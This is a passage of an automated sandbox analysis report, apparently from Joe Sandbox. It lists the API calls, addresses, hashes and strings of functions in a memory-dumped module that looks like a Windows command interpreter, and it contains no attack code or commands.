                              • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                              • Instruction Fuzzy Hash: 61D16B21A0DA52C2EB10BF16A884579B7A0BB85794FCC8232DE5D137EDDE3CE405A720
                              APIs
                              • memset.MSVCRT ref: 00007FF744F17013
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F17123
                                • Part of subcall function 00007FF744F11EA0: wcschr.MSVCRT(?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF744F30D54), ref: 00007FF744F11EB3
                              • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F1706E
                              • wcsncmp.MSVCRT ref: 00007FF744F170A5
                              • wcsstr.MSVCRT ref: 00007FF744F1F9DB
                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F1FA00
                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F1FA5F
                                • Part of subcall function 00007FF744F1823C: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F18280
                                • Part of subcall function 00007FF744F1823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F1829D
                                • Part of subcall function 00007FF744F13A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F2EAC5,?,?,?,00007FF744F2E925,?,?,?,?,00007FF744F0B9B1), ref: 00007FF744F13A56
                              • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F1FA3D
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                              • String ID: \\.\
                              • API String ID: 799470305-2900601889
                              • Opcode ID: c96739e036c4af460e843270059a1df39c16095e374773fe56c5b82f2b657300
                              • Instruction ID: d13f207a974d858b038bac1215526a98e11af15591800062390be7eff92292cb
                              • Opcode Fuzzy Hash: c96739e036c4af460e843270059a1df39c16095e374773fe56c5b82f2b657300
                              • Instruction Fuzzy Hash: 39518432A0CA82C6EB60BF2298902B9A7B0FB85B54F8D4535DE4D477D8DF3CD9459320
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                              • String ID:
                              • API String ID: 1944892715-0
                              • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                              • Instruction ID: 57354500c5e18ad981b340c689262095e7d20531c8ecc6ffe554f18588de612d
                              • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                              • Instruction Fuzzy Hash: 28B13F61A0DA42C6EB64BF13A4D4179E6A1BF95B80FCC9535CE4E473D9DE3CE844A320
                              APIs
                                • Part of subcall function 00007FF744F13578: _get_osfhandle.MSVCRT ref: 00007FF744F13584
                                • Part of subcall function 00007FF744F13578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                                • Part of subcall function 00007FF744F13578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                                • Part of subcall function 00007FF744F13578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                                • Part of subcall function 00007FF744F13578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                                • Part of subcall function 00007FF744F13578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              • _get_osfhandle.MSVCRT ref: 00007FF744F054DE
                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF744F01F7D), ref: 00007FF744F0552B
                              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF744F01F7D), ref: 00007FF744F0554F
                              • _get_osfhandle.MSVCRT ref: 00007FF744F2345F
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF744F01F7D), ref: 00007FF744F2347E
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF744F01F7D), ref: 00007FF744F234C3
                              • _get_osfhandle.MSVCRT ref: 00007FF744F234DB
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF744F01F7D), ref: 00007FF744F234FA
                                • Part of subcall function 00007FF744F136EC: _get_osfhandle.MSVCRT ref: 00007FF744F13715
                                • Part of subcall function 00007FF744F136EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF744F13770
                                • Part of subcall function 00007FF744F136EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F13791
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                              • String ID:
                              • API String ID: 1356649289-0
                              • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                              • Instruction ID: 595f2f2b99f8b3dcb5d587b66cb1e76065437cf52d6aa23c5cc059e1cd21e07a
                              • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                              • Instruction Fuzzy Hash: 14917E72A0C642CBE714BF22A48457AFAA1FB89B84F9C5135DE4E476D8DF3DE4409B10
                              APIs
                                • Part of subcall function 00007FF744F158E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF744F2C6DB), ref: 00007FF744F158EF
                                • Part of subcall function 00007FF744F1081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F1084E
                              • towupper.MSVCRT ref: 00007FF744F2C1C9
                              • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F2C31C
                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF744F2C5CB
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                              • String ID: %s $%s>$PROMPT$Unknown$\$x
                              • API String ID: 2242554020-3610052186
                              • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                              • Instruction ID: e673dbaddcd4f3140031796f49296e6c29f2d1d82e9db71fdd6f21a76f444311
                              • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                              • Instruction Fuzzy Hash: EC125335A0C692C1EB24BF16A49417AA6A0FF44B90FD84235DE9D037E8EF3DE541A720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: LocalTime$ErrorLast_get_osfhandle
                              • String ID: %s$/-.$:
                              • API String ID: 1644023181-879152773
                              • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                              • Instruction ID: afbb29a62f2e140d1c20b5992957d8a12a6f4bc0d4d98db597663a07c6026f40
                              • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                              • Instruction Fuzzy Hash: 4E919322A0CA42D2EB10BF66D4802B9E6A0FF84B84FCC4235DD4E426DDDE3DE545E721
                              APIs
                              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF744F27251), ref: 00007FF744F2628E
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ObjectSingleWait
                              • String ID: wil
                              • API String ID: 24740636-1589926490
                              • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                              • Instruction ID: 0a26a06a6b134e2d57132ff0621672f8f352521033e60e0a25c2c95e3e95aebf
                              • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                              • Instruction Fuzzy Hash: A9413F21A0C542C3F7607F12E48027AA6A1FF85785FE89131DD4946BD8DF3EE845A721
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                              • String ID: $Application$System
                              • API String ID: 3377411628-1881496484
                              • Opcode ID: 081ad1a78538691813d500f2119477f8c8ef04af017c9f27d6f6f5b033d517ce
                              • Instruction ID: 7d003354ed1d1cc055c6362b48e16dd0549a41830c45f8198357cbd72b7a286f
                              • Opcode Fuzzy Hash: 081ad1a78538691813d500f2119477f8c8ef04af017c9f27d6f6f5b033d517ce
                              • Instruction Fuzzy Hash: 37411C32B08A41DAE720AF61E4803EDB7A5FB89748F885135DE4E42B98EF3CD145C750
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                              • String ID: :$\
                              • API String ID: 3961617410-1166558509
                              • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                              • Instruction ID: 7e6624ecb9c5e7ed21391dcad65f581443c02ec2c515290b2a0c53c609434465
                              • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                              • Instruction Fuzzy Hash: 73216221A0CA42C7E750BF62A6C4079E6A1EB89B56BCC4231DD1F463D8DF3CD4449620
                              APIs
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106D6
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106F0
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F1074D
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F10762
                              • _wcsicmp.MSVCRT ref: 00007FF744F125CA
                              • _wcsicmp.MSVCRT ref: 00007FF744F125E8
                              • _wcsicmp.MSVCRT ref: 00007FF744F1260F
                              • _wcsicmp.MSVCRT ref: 00007FF744F12636
                              • _wcsicmp.MSVCRT ref: 00007FF744F12650
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmp$Heap$AllocProcess
                              • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                              • API String ID: 3407644289-1668778490
                              • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                              • Instruction ID: 4d3e807708b7a280612284a41794b0d11a3177ec574e75bba1fe25758d262200
                              • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                              • Instruction Fuzzy Hash: 81311D21A1C542C6F7107FA3E895279E6A4AF84B40F9D8035DE0E562DDDE3CE804E721
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                              • String ID: &()[]{}^=;!%'+,`~
                              • API String ID: 2516562204-381716982
                              • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                              • Instruction ID: 02cee971f4afe1e02a974d4d741b6003b0f2a3494c06e35c587cb0122f90f5a9
                              • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                              • Instruction Fuzzy Hash: B4C19072A19A51C6E754AF26E98027EB7A0FB44B94F885135EE8D03B9CDF3CE450E710
                              APIs
                                • Part of subcall function 00007FF744F0D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D46E
                                • Part of subcall function 00007FF744F0D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D485
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D4EE
                                • Part of subcall function 00007FF744F0D3F0: iswspace.MSVCRT ref: 00007FF744F0D54D
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D569
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D58C
                              • iswspace.MSVCRT ref: 00007FF744F17EEE
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heapiswspace$AllocProcess
                              • String ID: A
                              • API String ID: 3731854180-3554254475
                              • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                              • Instruction ID: 85cf29677a1db540bd2eb2a6c15a20ac2e49462d2df349e5e77da16022986b9d
                              • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                              • Instruction Fuzzy Hash: 81A16D2290DA82CAE760BF52A49067AF6A0FB55790F888035DE8D477DDDF3CA445E720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: MemoryProcessRead$AddressLibraryLoadProc
                              • String ID: NTDLL.DLL$NtQueryInformationProcess
                              • API String ID: 1580871199-2613899276
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                              • String ID: con
                              • API String ID: 689241570-4257191772
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                              • String ID: PE
                              • API String ID: 2941894976-4258593460
                              APIs
                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF744F2849D,?,?,?,00007FF744F2F0C7), ref: 00007FF744F10045
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF744F2F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F10071
                              • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F10092
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF744F100A7
                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F10148
                              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF744F10181
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                              • String ID:
                              • API String ID: 734197835-0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Enum$Openwcsrchr
                              • String ID: %s=%s$.$\Shell\Open\Command
                              • API String ID: 3402383852-1459555574
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$wcscmp
                              • String ID: %s
                              • API String ID: 243296809-3043279178
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$EnvironmentVariable
                              • String ID: DIRCMD
                              • API String ID: 1405722092-1465291664
                              APIs
                                • Part of subcall function 00007FF744F0CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDA6
                                • Part of subcall function 00007FF744F0CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDBD
                              • wcschr.MSVCRT(?,?,?,00007FF744F099DD), ref: 00007FF744F09A39
                                • Part of subcall function 00007FF744F0DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF744F0CEAA), ref: 00007FF744F0DFB8
                                • Part of subcall function 00007FF744F0DF60: RtlFreeHeap.NTDLL ref: 00007FF744F0DFCC
                                • Part of subcall function 00007FF744F0DF60: _setjmp.MSVCRT ref: 00007FF744F0E03E
                              • wcschr.MSVCRT(?,?,?,00007FF744F099DD), ref: 00007FF744F09AF0
                              • wcschr.MSVCRT(?,?,?,00007FF744F099DD), ref: 00007FF744F09B0F
                                • Part of subcall function 00007FF744F096E8: memset.MSVCRT ref: 00007FF744F097B2
                                • Part of subcall function 00007FF744F096E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F09880
                              • _wcsupr.MSVCRT ref: 00007FF744F1B844
                              • wcscmp.MSVCRT ref: 00007FF744F1B86D
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                              • String ID: FOR$ IF
                              • API String ID: 3663254013-2924197646
                              APIs
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F0D6
                              • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1BA
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F1E7
                              • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1FF
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F2BB
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit$iswspacewcschr
                              • String ID: )$=,;
                              • API String ID: 1959970872-2167043656
                              APIs
                              Strings
                              Memory Dump Source
